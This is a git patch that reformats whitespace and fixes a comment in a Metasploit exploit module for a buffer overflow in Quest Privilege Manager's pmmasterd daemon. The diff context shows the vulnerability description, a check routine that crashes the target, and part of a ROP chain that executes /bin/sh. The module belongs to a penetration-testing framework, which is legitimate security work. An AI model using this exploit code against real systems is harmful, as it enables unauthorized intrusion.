From 5e42dde6b62fd1487539c1c822bba7ebfcd15c50 Mon Sep 17 00:00:00 2001 From: m0t Date: Wed, 12 Apr 2017 16:25:21 +0100 Subject: [PATCH] msftidy clean up --- modules/exploits/linux/misc/quest_pmmasterd_bof.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb index b1490bd6af..b4f0db4c3a 100644 --- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb +++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote This modules exploits a buffer overflow in the Quest Privilege Manager, a software used to integrate Active Directory with Linux and Unix systems. The vulnerability exists in the pmmasterd daemon, and can only triggered when - the host has been configured as a policy server ( Privilege Manager for Unix + the host has been configured as a policy server ( Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow condition exists when handling requests of type ACT_ALERT_EVENT, where the size of a memcpy can be controlled by the attacker. This module only works against version < 6.0.0-27. @@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Arch' => ARCH_CMD, 'Platform' => 'unix', - 'Targets' => + 'Targets' => [ ['Quest Privilege Manager pmmasterd 6.0.0-27 x64', { @@ -67,12 +67,12 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::CPORT(rand(1024))], self.class ) end - #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog + #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog def check unless self.respond_to?(target[:check], true) fail_with(Failure::NoTarget, "Invalid target specified") end - + return self.send(target[:check]) end @@ -149,10 +149,10 @@ class MetasploitModule < Msf::Exploit::Remote 0x4FA215, # /bin/sh 0x40a99e, # pop rsi ; ret 0, # argv @rsi - 0x40c1a0, # pop rax, ret + 0x40c1a0, # pop rax, ret 0, # envp @rax 0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret - 0xcacc013, # padd + 0xcacc013, # padding 0x408a98, # execve, 0 ].pack("Q*")